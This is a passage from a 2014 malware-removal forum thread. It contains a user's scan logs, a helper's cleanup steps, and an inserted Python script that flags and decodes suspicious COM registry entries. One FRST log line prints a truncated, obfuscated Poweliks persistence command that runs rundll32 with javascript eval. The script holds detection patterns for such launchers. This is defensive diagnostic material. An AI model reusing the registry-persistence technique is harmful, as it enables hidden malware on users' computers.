My Life Story (HKLM-x32\...\My Life Story1.0) (Version: 1.0 - AllSmartGames)
Nero BackItUp 4 (HKLM-x32\...\{2b15b99d-dcef-48ab-889e-e4a65393da0f}) (Version:  - Nero AG)
Nero ControlCenter (x32 Version: 0.0.0.1 - Nero AG) Hidden
Nero ControlCenter (x32 Version: 9.0.0.1 - Nero AG) Hidden
Nero InCD-Reader (HKLM-x32\...\{31a26041-7b9c-49e0-b739-aaa2fe5fd1d4}) (Version:  - Nero AG)
Nero Installer (x32 Version: 2.0.0.1 - Nero AG) Hidden
Nero MediaHome 4 (HKLM-x32\...\{01ca97d3-1823-4a9e-8170-d142f97ffbbe}) (Version:  - Nero AG)
Nero Move it (HKLM-x32\...\{cf6bdcfe-40f9-49bf-8b01-71446c89e332}) (Version:  - Nero AG)
neroxml (x32 Version: 1.0.0 - Nero AG) Hidden
Nessus64 (HKLM\...\{7808E43D-2A8C-4F62-B7DC-558B7185B2CF}) (Version: 4.4.1.15078 - Tenable Network Security, Inc.)
Network64 (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NirSoft BlueScreenView (HKLM-x32\...\NirSoft BlueScreenView) (Version:  - )
Nmap 5.51 (HKLM-x32\...\Nmap) (Version:  - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.5 - )
Ogg Codecs 0.81.15562 (HKLM\...\Ogg Codecs) (Version: 0.81.15562 - Xiph.Org)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Oracle VM VirtualBox 4.0.2 (HKLM\...\{ADCF7C16-C3AC-4AFB-A738-968C86A5C2CF}) (Version: 4.0.2 - Oracle Corporation)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
QuickSet (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 9.0.12 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
RCT3 Soaked (HKLM-x32\...\{EA926717-CE5A-4CB4-AB21-9E6E9565A458}) (Version: 1.00.000 - )
RICOH R5C83x/84x Flash Media Controller Driver Ver.3.54.05 (HKLM-x32\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.54.05 - RICOH)
Rosetta Stone Version 3 (HKLM-x32\...\{148E08FF-D7C4-46ED-8D4D-601C67FE0AFD}) (Version: 3.3.5.2 - Rosetta Stone Ltd.)
RPG Maker VX RTP (HKLM-x32\...\RPG Maker VX RTP =XWareM2 Group=_is1) (Version:  - )
runtime64 (Version: 1.0.0 - immunet) Hidden
Scan (x32 Version: 140.0.167.000 - Hewlett-Packard) Hidden
School Tycoon (HKLM-x32\...\{7CFFE053-748A-44DC-A248-06EA38E4BC03}) (Version:  - )
SDK Debuggers (x32 Version: 8.37.0 - Microsoft Corporation) Hidden
SeaMonkey (1.1.16) (HKLM-x32\...\SeaMonkey (1.1.16)) (Version:  - )
SecurDisc Viewer (HKLM-x32\...\{e801a8d6-855e-4138-8eed-b60eeb1637c6}) (Version:  - Nero AG)
SensePost Wikto (HKLM-x32\...\{3DDFA9CC-53EF-48F6-ACA9-93172E25DF70}) (Version: 2.0 - SensePost)
SimCity 4 Deluxe (HKLM-x32\...\{A7A34FC9-DF24-4A36-00AD-D4EFE94CC116}) (Version:  - )
SimCity™ Societies (HKLM-x32\...\{9B0F9788-3141-4009-846E-52E59843E963}) (Version: 1.0.0.0 - Electronic Arts)
SimCity™ Societies (x32 Version: 1.0.0.0 - Electronic Arts) Hidden
SimCity™ Societies Destinations (HKLM-x32\...\{D1C7BB12-BE01-11DC-AAC9-EEBA55D89593}) (Version: 1.0.0.1 - Electronic Arts)
Sleuth 1.4.3 (International Build) (HKLM-x32\...\Sleuth 1.4.3 (International Build)_is1) (Version: 1.4.3 - David Zimmer)
SoulSeek 157 NS 13c (HKLM-x32\...\Soulseek2) (Version:  - )
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.6.1020 - SUPERAntiSpyware.com)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
System Requirements Lab for Intel (HKLM-x32\...\{C71067FC-288F-4E0B-88C6-44DFDA8311E2}) (Version: 4.5.9.0 - Husdawg, LLC)
Toolbox (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden
Unknown Device Identifier 8.01 (HKLM\...\Unknown Device Identifier_is1) (Version: 8.01 - Huntersoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM-x32\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2473228) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISE_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM-x32\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM-x32\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM-x32\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2889914) 32-Bit Edition (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{F3F83933-75FC-4B60-84F2-3F8FA63D042E}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM-x32\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.4053 (x32 Version: 1.1.0 - DivX, Inc) Hidden
Virtual Villagers - New Believers Just For Fun Games (HKLM-x32\...\Virtual Villagers - New Believers Just For Fun Games) (Version:  - )
VirtualCloneDrive (HKLM-x32\...\VirtualCloneDrive) (Version: 5.4.7.0 - Elaborate Bytes)
Vista Codec Package (HKLM-x32\...\{F9FD80CE-0448-4D4F-8BCD-77FC514C3F99}) (Version: 5.0.5 - Shark007)
Visual C++ 2008 x86 Runtime - (v9.0.30729) (x32 Version: 9.0.30729 - Microsoft Corporation) Hidden
Visual C++ 2008 x86 Runtime - v9.0.30729.01 (HKLM-x32\...\{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01) (Version: 9.0.30729.01 - Microsoft Corporation)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{021C4C4F-C93C-4425-BFFD-C2D16776BFAE}) (Version: 8.0.0.35 - GRISOFT, s.r.o.)
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
VS10Runtimex64 (Version: 1.0.0 - sourcefire) Hidden
WebReg (x32 Version: 140.0.213.017 - Hewlett-Packard) Hidden
WhoCrashed 4.02 (HKLM\...\WhoCrashed_is1) (Version:  - Resplendence Software Projects Sp.)
WinDjView 1.0.3 (HKLM-x32\...\WinDjView) (Version: 1.0.3 - Andrew Zhezherun)
Windows Installer Clean Up (HKLM-x32\...\{121634B0-2F4B-11D3-ADA3-00C04F52DD52}) (Version: 3.00.00.0000 - Microsoft Corporation)
Windows Live Call (x32 Version: 14.0.8064.0206 - Microsoft Corporation) Hidden
Windows Live Communications Platform (x32 Version: 14.0.8064.206 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8064.0206 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 14.0.8064.206 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 14.0.8064.0206 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM-x32\...\{A1BF9950-8CDB-468E-83FA-EACFB00EA7D5}) (Version: 14.0.8064.206 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
Windows Media Encoder 9 Series (x32 Version: 9.00.3374 - Microsoft Corporation) Hidden
Windows Media Encoder 9 Series x64 Edition (HKLM\...\Windows Media Encoder 9) (Version:  - )
Windows Media Encoder 9 Series x64 Edition (Version: 10.0.0.3822 - Microsoft Corporation) Hidden
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
Windows Software Development Kit (HKLM-x32\...\{9a2c2c20-17e6-43c4-be07-a3e0c5cea9f7}) (Version: 8.37.0 - Microsoft Corporation)
WinPcap 4.1.2 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2001 - CACE Technologies)
WinRAR 4.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
Wireshark 1.4.4 (HKLM-x32\...\Wireshark) (Version: 1.4.4 - The Wireshark developer community, http://www.wireshark.org)
Wise Registry Cleaner 7.87 (HKLM-x32\...\Wise Registry Cleaner_is1) (Version: 7.87 - WiseCleaner.com, Inc.)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Ashley\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Ashley\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Ashley\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> "C:\Users\Ashley\AppData\Local\Facebook\Update\FacebookUpdate.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\1.3.21.79\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\1.3.21.79\GoogleUpdateOnDemand.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Chrome\Application\21.0.1180.89\delegate_execute.exe" No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{9E385F0A-0BA2-430C-96AA-4399C5E40F6C}\localserver32 -> C:\PROGRA~2\Skype\Phone\Skype.exe No File
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{d33f3ced-d7d5-44f1-a9fe-6927dabb1934}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-2293499177-2261026601-659138957-1001_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> "C:\Users\Ashley\AppData\Local\Google\Update\1.3.21.79\GoogleUpdateOnDemand.exe" No File
 
==================== Restore Points  =========================
 

 


Edited by hamluis, 18 October 2014 - 05:30 PM.
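The FRST entry marked `<==== Poweliks?` in the log above is a per-user COM `localserver32` value that launches `rundll32.exe` with a `javascript:` URL instead of pointing at a file on disk. The following is an added example, not part of the original post or of FRST: it triages CustomCLSID lines in that format and undoes the character shift visible in the entry's truncated `eval` string. The function names, the placeholder SID and CLSIDs, and the sample lines are constructed for illustration.

```python
import re

# Constructed sample in the FRST "CustomCLSID" line format. The SID and CLSIDs are
# placeholders; the obfuscated fragment is the truncated one visible in the log above.
SAMPLE_LOG = r'''
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32 -> C:\Users\Example\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-0-0-0-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000002}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-0-0-0-1001_Classes\CLSID\{00000000-0000-0000-0000-000000000003}\localserver32 -> C:\Program Files (x86)\Google\Google Talk\googletalk.exe (Google)
'''

# One CustomCLSID line: hive, CLSID, server type, then the registered command.
LINE_RE = re.compile(
    r'^CustomCLSID:\s+(?P<hive>HKU\\[^\\]+)\\CLSID\\(?P<clsid>\{[0-9A-Fa-f-]{36}\})'
    r'\\(?P<kind>\w+)\s+->\s+(?P<command>.*)$'
)

# Argument of eval("..."), stopping at the closing quote, at FRST's truncation
# notice, or at end of line, whichever comes first.
EVAL_RE = re.compile(
    r'eval\("(?P<blob>.*?)(?:"\)|\s+\(the data entry has \d+ more characters\)|$)'
)

# Strings that suggest a decoded blob is script source (assumed heuristic).
KEYWORDS = ("document.", "script", "function", "activexobject")


def is_script_launcher(command):
    """True when a COM server command runs script through rundll32/mshtml."""
    c = command.lower()
    return "rundll32" in c and ("javascript:" in c or "runhtmlapplication" in c)


def shift_decode(blob, max_shift=3):
    """Try small per-character shifts; return (shift, text) if script keywords appear.

    The entry in this log decodes with a shift of one. Other shifts are tried
    only as a generalisation and are an assumption, not something the log shows.
    """
    for shift in range(1, max_shift + 1):
        decoded = "".join(
            chr(ord(ch) - shift) if ord(ch) - shift >= 0x20 else ch for ch in blob
        )
        if any(k in decoded.lower() for k in KEYWORDS):
            return shift, decoded
    return None


def triage(log_text):
    """Classify each CustomCLSID line as script-launcher, missing-target or ok."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        entry = {"clsid": m["clsid"], "kind": m["kind"], "hive": m["hive"],
                 "verdict": "ok", "shift": None, "decoded": None}
        command = m["command"]
        if is_script_launcher(command):
            entry["verdict"] = "script-launcher"
            blob = EVAL_RE.search(command)
            result = shift_decode(blob["blob"]) if blob else None
            if result:
                entry["shift"], entry["decoded"] = result
        elif command.rstrip().endswith("No File"):
            # FRST's marker for a registered path that no longer exists on disk.
            entry["verdict"] = "missing-target"
        findings.append(entry)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["verdict"], f["clsid"], f["kind"], f["decoded"] or "")
```

Only the `script-launcher` verdict corresponds to the entry FRST flagged; `missing-target` entries are stale registrations left behind by uninstalled software, like the Google Update and Dropbox lines in the log.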



 


#2 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • Gender:Male
  • Location:Germany
  • Local time:02:53 PM

Posted 19 October 2014 - 02:06 PM

First we will remove the Adware, then Poweliks.

Step 1: AdwCleaner

Please download AdwCleaner (by Xplode) from the link below and save it to your Desktop:

Download Mirror #1
  • Right-click on AdwCleaner.exe and select Run as administrator. (If you have Windows XP then just run it.)
  • Click Scan and let the scan run.
  • When it finishes, click Clean, following the on-screen prompts.
  • After your computer reboots, a log will open. Please Copy (Ctrl+C) and Paste (Ctrl+V) this into your next post.
Note: The log can also be found in here: C:\AdwCleaner\

Step 2: Malwarebytes

Please download Malwarebytes Anti-Malware to your desktop. Install the programme and select Update.
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits


Go back to the Dashboard and select Scan Now


If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.


On completion of the scan (or after the reboot) select View Detailed Log
Select Export > Select text file and save to the desktop
Attach/Post that log

Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: FRST Scan
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

 
 


#3 sp000ky

sp000ky
  • Topic Starter

  • Members
  • 3 posts
  • Local time:12:53 PM

Posted 19 October 2014 - 08:02 PM

- Ran ADWCleaner, then rebooted. It detected some things but the 30 dllhost processes were still present upon reboot.
- Updated MalwareBytes, checked Scan for rootkits, and did a scan. Nothing detected. Maybe it's because I then disconnected from the Internet, but I went into Task Manager and closed all the dllhost processes and about 20 seemed to not come back. Well, there is one dllhost.exe consuming 40K memory, and then about 10 dllhost.exe with ###CLIENT### in the command line column, each consuming about 4-5K memory. If I close the 40k dllhost.exe process, it eventually returns but only returns ONE process instead of 20. The 10 ###CLIENT### dllhost processes still re-appear after I close them. But.. at least something's changed!..  UPDATE: one of the ###CLIENT### processes just started consuming 140K memory.. that's weird.
- Updated Junkware Removal Tool, then ran scan. Log below
- Ran FRST scan. Looks like it's still detecting Poweliks
 
And now all the dllhost processes are back. Sigh.. 
 
Thanks a million for helping me Machiavelli :)
 
 
AdwCleaner.txt
 
# AdwCleaner v4.000 - Report created 19/10/2014 at 15:23:58
# DB v2014-10-19.11
# Updated 12/10/2014 by Xplode
# Operating System : Windows ™ Vista Home Premium Service Pack 1 (64 bits)
# Username : Ashley - LAPTOP
# Running from : C:\Users\Ashley\Downloads\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage-journal
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.plyrics.com_0.localstorage
File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.plyrics.com_0.localstorage-journal
 
***** [ Scheduled Tasks ] *****
 
Task Deleted : Driver Booster Update
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Google\Chrome\Extensions\oejkcgajlodefenbbjdnaiahmbnnoole
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{6DDA37BA-0553-499A-AE0D-BEBA67204548}
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe]
Key Deleted : HKLM\SOFTWARE\dt soft\daemon tools toolbar
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v8.0.6001.19088
 
 
-\\ Mozilla Firefox v32.0.2 (x86 en-US)
 
 
-\\ Google Chrome v38.0.2125.101
 
Deleted [Search Provider] : hxxp://movies.netflix.com/WiSearch?raw_query=lion+king&ac_category_type=none&ac_rel_posn=-1&ac_abs_posn=-1&v1={searchTerms}&search_submit=
Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
 
*************************
 
AdwCleaner[R0].txt - [3793 octets] - [16/02/2014 17:49:36]
AdwCleaner[R1].txt - [2904 octets] - [19/10/2014 15:19:54]
AdwCleaner[S0].txt - [3837 octets] - [16/02/2014 17:51:34]
AdwCleaner[S1].txt - [2768 octets] - [19/10/2014 15:23:58]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [2828 octets] ##########
 
 
 
MBAM.txt
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 10/19/2014
Scan Time: 3:27:50 PM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.10.19.08
Rootkit Database: v2014.10.17.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 1
CPU: x64
File System: NTFS
User: Ashley
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 600776
Time Elapsed: 51 min, 28 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Deep Rootkit Scan: Enabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 0
(No malicious items detected)
 
Registry Values: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 0
(No malicious items detected)
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
 
 
 
JRT.txt
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.14.2014:1)
OS: Windows ™ Vista Home Premium x64
Ran by Ashley on Sun 10/19/2014 at 16:39:01.47
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
Successfully deleted: [File] "C:\Windows\wininit.ini"
 
 
 
~~~ Folders
 
Successfully deleted: [Folder] "C:\Users\Ashley\AppData\Roaming\getrighttogo"
 
 
 
~~~ FireFox
 
Successfully deleted: [Folder] C:\Users\Ashley\AppData\Roaming\mozilla\firefox\profiles\0w0o55iv.default\extensions\staged
Successfully deleted the following from C:\Users\Ashley\AppData\Roaming\mozilla\firefox\profiles\0w0o55iv.default\prefs.js
 
Emptied folder: C:\Users\Ashley\AppData\Roaming\mozilla\firefox\profiles\0w0o55iv.default\minidumps [90 files]
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Sun 10/19/2014 at 17:02:15.28
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
FRST.txt
 
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by Ashley (administrator) on LAPTOP on 19-10-2014 17:03:27
Running from C:\Users\Ashley\Desktop
Loaded Profiles: Ashley & RA Media Server (Available profiles: Ashley & RA Media Server & Mcx1 & Games & Study & Administrator & Guest)
Platform: Windows Vista ™ Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 8
